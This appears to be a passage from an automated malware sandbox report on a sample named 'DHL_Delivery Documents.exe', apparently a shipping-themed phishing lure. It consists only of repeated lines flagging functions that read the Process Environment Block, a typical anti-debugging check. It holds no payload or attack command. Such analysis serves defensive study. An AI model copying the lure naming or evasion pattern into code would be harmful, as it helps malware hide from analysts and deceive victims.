            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E53E mov eax, dword ptr fs:[00000030h]8_2_01C3E53E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C104E5 mov ecx, dword ptr fs:[00000030h]8_2_01C104E5
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CCA49A mov eax, dword ptr fs:[00000030h]8_2_01CCA49A
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C164AB mov eax, dword ptr fs:[00000030h]8_2_01C164AB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C444B0 mov ecx, dword ptr fs:[00000030h]8_2_01C444B0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9A4B0 mov eax, dword ptr fs:[00000030h]8_2_01C9A4B0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E443 mov eax, dword ptr fs:[00000030h]8_2_01C4E443
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E443 mov eax, dword ptr fs:[00000030h]8_2_01C4E443
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E443 mov eax, dword ptr fs:[00000030h]8_2_01C4E443
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E443 mov eax, dword ptr fs:[00000030h]8_2_01C4E443
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E443 mov eax, dword ptr fs:[00000030h]8_2_01C4E443
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E443 mov eax, dword ptr fs:[00000030h]8_2_01C4E443
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E443 mov eax, dword ptr fs:[00000030h]8_2_01C4E443
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4E443 mov eax, dword ptr fs:[00000030h]8_2_01C4E443
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3245A mov eax, dword ptr fs:[00000030h]8_2_01C3245A
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CCA456 mov eax, dword ptr fs:[00000030h]8_2_01CCA456
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0645D mov eax, dword ptr fs:[00000030h]8_2_01C0645D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9C460 mov ecx, dword ptr fs:[00000030h]8_2_01C9C460
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3A470 mov eax, dword ptr fs:[00000030h]8_2_01C3A470
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3A470 mov eax, dword ptr fs:[00000030h]8_2_01C3A470
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3A470 mov eax, dword ptr fs:[00000030h]8_2_01C3A470
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C48402 mov eax, dword ptr fs:[00000030h]8_2_01C48402
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C48402 mov eax, dword ptr fs:[00000030h]8_2_01C48402
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C48402 mov eax, dword ptr fs:[00000030h]8_2_01C48402
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0E420 mov eax, dword ptr fs:[00000030h]8_2_01C0E420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0E420 mov eax, dword ptr fs:[00000030h]8_2_01C0E420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0E420 mov eax, dword ptr fs:[00000030h]8_2_01C0E420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C0C427 mov eax, dword ptr fs:[00000030h]8_2_01C0C427
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C96420 mov eax, dword ptr fs:[00000030h]8_2_01C96420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C96420 mov eax, dword ptr fs:[00000030h]8_2_01C96420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C96420 mov eax, dword ptr fs:[00000030h]8_2_01C96420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C96420 mov eax, dword ptr fs:[00000030h]8_2_01C96420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C96420 mov eax, dword ptr fs:[00000030h]8_2_01C96420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C96420 mov eax, dword ptr fs:[00000030h]8_2_01C96420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C96420 mov eax, dword ptr fs:[00000030h]8_2_01C96420
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A430 mov eax, dword ptr fs:[00000030h]8_2_01C4A430
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1C7C0 mov eax, dword ptr fs:[00000030h]8_2_01C1C7C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C907C3 mov eax, dword ptr fs:[00000030h]8_2_01C907C3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9E7E1 mov eax, dword ptr fs:[00000030h]8_2_01C9E7E1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C327ED mov eax, dword ptr fs:[00000030h]8_2_01C327ED
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C327ED mov eax, dword ptr fs:[00000030h]8_2_01C327ED
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C327ED mov eax, dword ptr fs:[00000030h]8_2_01C327ED
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C147FB mov eax, dword ptr fs:[00000030h]8_2_01C147FB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C147FB mov eax, dword ptr fs:[00000030h]8_2_01C147FB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB678E mov eax, dword ptr fs:[00000030h]8_2_01CB678E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC47A0 mov eax, dword ptr fs:[00000030h]8_2_01CC47A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C107AF mov eax, dword ptr fs:[00000030h]8_2_01C107AF
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4674D mov esi, dword ptr fs:[00000030h]8_2_01C4674D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4674D mov eax, dword ptr fs:[00000030h]8_2_01C4674D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4674D mov eax, dword ptr fs:[00000030h]8_2_01C4674D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C10750 mov eax, dword ptr fs:[00000030h]8_2_01C10750
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9E75D mov eax, dword ptr fs:[00000030h]8_2_01C9E75D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52750 mov eax, dword ptr fs:[00000030h]8_2_01C52750
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52750 mov eax, dword ptr fs:[00000030h]8_2_01C52750
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C94755 mov eax, dword ptr fs:[00000030h]8_2_01C94755
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C18770 mov eax, dword ptr fs:[00000030h]8_2_01C18770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20770 mov eax, dword ptr fs:[00000030h]8_2_01C20770
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4C700 mov eax, dword ptr fs:[00000030h]8_2_01C4C700
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C10710 mov eax, dword ptr fs:[00000030h]8_2_01C10710
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C40710 mov eax, dword ptr fs:[00000030h]8_2_01C40710
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4C720 mov eax, dword ptr fs:[00000030h]8_2_01C4C720
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4C720 mov eax, dword ptr fs:[00000030h]8_2_01C4C720
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4273C mov eax, dword ptr fs:[00000030h]8_2_01C4273C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4273C mov ecx, dword ptr fs:[00000030h]8_2_01C4273C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4273C mov eax, dword ptr fs:[00000030h]8_2_01C4273C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8C730 mov eax, dword ptr fs:[00000030h]8_2_01C8C730
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A6C7 mov ebx, dword ptr fs:[00000030h]8_2_01C4A6C7
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A6C7 mov eax, dword ptr fs:[00000030h]8_2_01C4A6C7
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C906F1 mov eax, dword ptr fs:[00000030h]8_2_01C906F1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C906F1 mov eax, dword ptr fs:[00000030h]8_2_01C906F1
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E6F2 mov eax, dword ptr fs:[00000030h]8_2_01C8E6F2
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E6F2 mov eax, dword ptr fs:[00000030h]8_2_01C8E6F2
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E6F2 mov eax, dword ptr fs:[00000030h]8_2_01C8E6F2
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E6F2 mov eax, dword ptr fs:[00000030h]8_2_01C8E6F2
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C14690 mov eax, dword ptr fs:[00000030h]8_2_01C14690
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C14690 mov eax, dword ptr fs:[00000030h]8_2_01C14690
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4C6A6 mov eax, dword ptr fs:[00000030h]8_2_01C4C6A6
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C466B0 mov eax, dword ptr fs:[00000030h]8_2_01C466B0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2C640 mov eax, dword ptr fs:[00000030h]8_2_01C2C640
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD866E mov eax, dword ptr fs:[00000030h]8_2_01CD866E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CD866E mov eax, dword ptr fs:[00000030h]8_2_01CD866E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A660 mov eax, dword ptr fs:[00000030h]8_2_01C4A660
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A660 mov eax, dword ptr fs:[00000030h]8_2_01C4A660
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C42674 mov eax, dword ptr fs:[00000030h]8_2_01C42674
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E609 mov eax, dword ptr fs:[00000030h]8_2_01C8E609
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h]8_2_01C2260B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h]8_2_01C2260B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h]8_2_01C2260B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h]8_2_01C2260B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h]8_2_01C2260B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h]8_2_01C2260B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2260B mov eax, dword ptr fs:[00000030h]8_2_01C2260B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C52619 mov eax, dword ptr fs:[00000030h]8_2_01C52619
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C46620 mov eax, dword ptr fs:[00000030h]8_2_01C46620
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C48620 mov eax, dword ptr fs:[00000030h]8_2_01C48620
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C2E627 mov eax, dword ptr fs:[00000030h]8_2_01C2E627
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1262C mov eax, dword ptr fs:[00000030h]8_2_01C1262C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA69C0 mov eax, dword ptr fs:[00000030h]8_2_01CA69C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h]8_2_01C1A9D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h]8_2_01C1A9D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h]8_2_01C1A9D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h]8_2_01C1A9D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h]8_2_01C1A9D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C1A9D0 mov eax, dword ptr fs:[00000030h]8_2_01C1A9D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C449D0 mov eax, dword ptr fs:[00000030h]8_2_01C449D0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDA9D3 mov eax, dword ptr fs:[00000030h]8_2_01CDA9D3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9E9E0 mov eax, dword ptr fs:[00000030h]8_2_01C9E9E0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C429F9 mov eax, dword ptr fs:[00000030h]8_2_01C429F9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C429F9 mov eax, dword ptr fs:[00000030h]8_2_01C429F9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C229A0 mov eax, dword ptr fs:[00000030h]8_2_01C229A0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C109AD mov eax, dword ptr fs:[00000030h]8_2_01C109AD
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C109AD mov eax, dword ptr fs:[00000030h]8_2_01C109AD
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C989B3 mov esi, dword ptr fs:[00000030h]8_2_01C989B3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C989B3 mov eax, dword ptr fs:[00000030h]8_2_01C989B3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C989B3 mov eax, dword ptr fs:[00000030h]8_2_01C989B3
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE4940 mov eax, dword ptr fs:[00000030h]8_2_01CE4940
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C90946 mov eax, dword ptr fs:[00000030h]8_2_01C90946
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C36962 mov eax, dword ptr fs:[00000030h]8_2_01C36962
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C36962 mov eax, dword ptr fs:[00000030h]8_2_01C36962
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C36962 mov eax, dword ptr fs:[00000030h]8_2_01C36962
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C5096E mov eax, dword ptr fs:[00000030h]8_2_01C5096E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C5096E mov edx, dword ptr fs:[00000030h]8_2_01C5096E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C5096E mov eax, dword ptr fs:[00000030h]8_2_01C5096E
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB4978 mov eax, dword ptr fs:[00000030h]8_2_01CB4978
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB4978 mov eax, dword ptr fs:[00000030h]8_2_01CB4978
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9C97C mov eax, dword ptr fs:[00000030h]8_2_01C9C97C
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E908 mov eax, dword ptr fs:[00000030h]8_2_01C8E908
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C8E908 mov eax, dword ptr fs:[00000030h]8_2_01C8E908
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C08918 mov eax, dword ptr fs:[00000030h]8_2_01C08918
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C08918 mov eax, dword ptr fs:[00000030h]8_2_01C08918
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9C912 mov eax, dword ptr fs:[00000030h]8_2_01C9C912
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA892B mov eax, dword ptr fs:[00000030h]8_2_01CA892B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9892A mov eax, dword ptr fs:[00000030h]8_2_01C9892A
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3E8C0 mov eax, dword ptr fs:[00000030h]8_2_01C3E8C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CE08C0 mov eax, dword ptr fs:[00000030h]8_2_01CE08C0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CDA8E4 mov eax, dword ptr fs:[00000030h]8_2_01CDA8E4
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4C8F9 mov eax, dword ptr fs:[00000030h]8_2_01C4C8F9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4C8F9 mov eax, dword ptr fs:[00000030h]8_2_01C4C8F9
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C10887 mov eax, dword ptr fs:[00000030h]8_2_01C10887
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9C89D mov eax, dword ptr fs:[00000030h]8_2_01C9C89D
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C22840 mov ecx, dword ptr fs:[00000030h]8_2_01C22840
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C40854 mov eax, dword ptr fs:[00000030h]8_2_01C40854
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C14859 mov eax, dword ptr fs:[00000030h]8_2_01C14859
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C14859 mov eax, dword ptr fs:[00000030h]8_2_01C14859
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA6870 mov eax, dword ptr fs:[00000030h]8_2_01CA6870
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CA6870 mov eax, dword ptr fs:[00000030h]8_2_01CA6870
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9E872 mov eax, dword ptr fs:[00000030h]8_2_01C9E872
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9E872 mov eax, dword ptr fs:[00000030h]8_2_01C9E872
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9C810 mov eax, dword ptr fs:[00000030h]8_2_01C9C810
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB483A mov eax, dword ptr fs:[00000030h]8_2_01CB483A
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CB483A mov eax, dword ptr fs:[00000030h]8_2_01CB483A
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C4A830 mov eax, dword ptr fs:[00000030h]8_2_01C4A830
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C32835 mov eax, dword ptr fs:[00000030h]8_2_01C32835
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C32835 mov eax, dword ptr fs:[00000030h]8_2_01C32835
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C32835 mov eax, dword ptr fs:[00000030h]8_2_01C32835
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C32835 mov ecx, dword ptr fs:[00000030h]8_2_01C32835
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C32835 mov eax, dword ptr fs:[00000030h]8_2_01C32835
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C32835 mov eax, dword ptr fs:[00000030h]8_2_01C32835
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C30BCB mov eax, dword ptr fs:[00000030h]8_2_01C30BCB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C30BCB mov eax, dword ptr fs:[00000030h]8_2_01C30BCB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C30BCB mov eax, dword ptr fs:[00000030h]8_2_01C30BCB
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C10BCD mov eax, dword ptr fs:[00000030h]8_2_01C10BCD
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C10BCD mov eax, dword ptr fs:[00000030h]8_2_01C10BCD
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C10BCD mov eax, dword ptr fs:[00000030h]8_2_01C10BCD
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CBEBD0 mov eax, dword ptr fs:[00000030h]8_2_01CBEBD0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C18BF0 mov eax, dword ptr fs:[00000030h]8_2_01C18BF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C18BF0 mov eax, dword ptr fs:[00000030h]8_2_01C18BF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C18BF0 mov eax, dword ptr fs:[00000030h]8_2_01C18BF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C9CBF0 mov eax, dword ptr fs:[00000030h]8_2_01C9CBF0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C3EBFC mov eax, dword ptr fs:[00000030h]8_2_01C3EBFC
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20BBE mov eax, dword ptr fs:[00000030h]8_2_01C20BBE
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01C20BBE mov eax, dword ptr fs:[00000030h]8_2_01C20BBE
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC4BB0 mov eax, dword ptr fs:[00000030h]8_2_01CC4BB0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC4BB0 mov eax, dword ptr fs:[00000030h]8_2_01CC4BB0
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC4B4B mov eax, dword ptr fs:[00000030h]8_2_01CC4B4B
            Source: C:\Users\user\Desktop\DHL_Delivery Documents.exeCode function: 8_2_01CC4B4B mov eax, dword ptr fs:[00000030h]8_2_01CC4B4B
